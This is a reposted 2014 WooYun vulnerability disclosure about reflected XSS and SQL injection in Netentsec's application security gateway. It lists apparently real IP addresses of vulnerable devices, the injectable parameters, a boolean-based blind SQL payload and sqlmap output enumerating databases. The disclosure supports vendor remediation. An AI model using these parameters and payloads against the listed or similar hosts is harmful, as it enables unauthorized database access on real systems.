linda

漏洞概要
缺陷编号：        WooYun-2014-69117
漏洞标题：        网康科技应用安全网关跨站脚本漏洞及SQL注射一枚
相关厂商：        网康科技
漏洞作者：        大大灰狼
提交时间：        2014-07-20 19:27
公开时间：        2014-10-18 19:28
漏洞类型：        SQL注射漏洞
危害等级：        中
自评Rank：        10
漏洞状态：        厂商已经确认
漏洞来源：        http://www.wooyun.org
Tags标签：       反射型xss

漏洞详情披露状态：
2014-07-20：        细节已通知厂商并且等待厂商处理中
2014-07-24：        厂商已经确认，细节仅向厂商公开
2014-07-27：        细节向第三方安全合作伙伴开放
2014-08-03：        细节向核心白帽子及相关领域专家公开
2014-08-13：        细节向普通白帽子公开
2014-09-02：        细节向实习白帽子公开
2014-10-18：        细节向公众公开

简要描述：网康科技应用安全网关，通用型跨站脚本漏洞小集合！！
不要说这不是你们的设备，更不要自己偷偷修复，哈哈！！
相信你们是有节操的网络设备厂商！！哈哈！！
详细说明：注入与http://wooyun.org/bugs/wooyun-2014-058913 重复


1 通用型XSS漏洞一，https://IP/WebPages/login.php?errstr=xss">。。。







通用型证明：

https://115.24.177.57/WebPages/login.php?errstr=xss">。。。

https://211.68.223.12/WebPages/login.php?errstr=xss">。。。

https://1.202.234.22/WebPages/login.php?errstr=xss">。。。

https://58.30.139.200/WebPages/login.php?errstr=xss">。。。

https://221.213.45.231/WebPages/login.php?errstr=xss">。。。

https://219.129.33.114:10009/WebPages/login.php?errstr=xss">。。。

https://202.113.20.208/WebPages/login.php?errstr=xss">。。。

https://whqxj.com/WebPages/login.php?errstr=xss">。。。

https://122.226.150.69/WebPages/login.php?errstr=xss">。。。



通用型XSS漏洞二，https://IP/WebPages/login.php?errstr=xss">。。。







通用型证明：

https://115.24.177.57/3g/menu.php?uid=xss">。。。

https://211.68.223.12/3g/menu.php?uid=xss">。。。

https://58.30.139.200/3g/menu.php?uid=xss">。。。

https://219.129.33.114:10009/3g/menu.php?uid=xss">。。。



通过谷歌或shodan可以搜索大量设备，均受影响，这里就不一一举例。


漏洞证明：







https://211.68.223.12/3g/menu.php?uid=1 注入参数uid


code 区域Place: GET
Parameter: uid
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: uid=-4918 OR (3862=3862)#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: uid=1。。。

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: uid=1 。。。

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: uid=1 。。。
---
[12:30:29] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.17, PHP 5.3.4
back-end DBMS: MySQL 5.0
[12:30:29] [INFO] fetching database names
[12:30:31] [INFO] the SQL query used returns 6 entries
[12:30:33] [INFO] retrieved: "information_schema"
[12:30:34] [INFO] retrieved: "iscserver"
[12:30:36] [INFO] retrieved: "iscserver_bak"
[12:30:38] [INFO] retrieved: "mysql"
[12:30:39] [INFO] retrieved: "performance_schema"
[12:30:41] [INFO] retrieved: "test"
available databases [6]:                                                                                               
information_schema
iscserver
iscserver_bak
mysql
performance_schema
test
修复方案：你们更懂
版权声明：转载请注明来源 大大灰狼@乌云

漏洞回应
厂商回应：
危害等级：中漏洞Rank：8
确认时间：2014-07-24 10:56
厂商回复：感谢您的支持，能否补充一下SQL注入的详情呢？
最新状态：暂无网康科技应用安全网关XSS跨站脚本漏洞及SQL注射一枚
原文：http://www.wooyun.org/bugs/wooyun-2014-069117

[ 本帖最后由 linda 于 2016-2-16 11:06 编辑 ]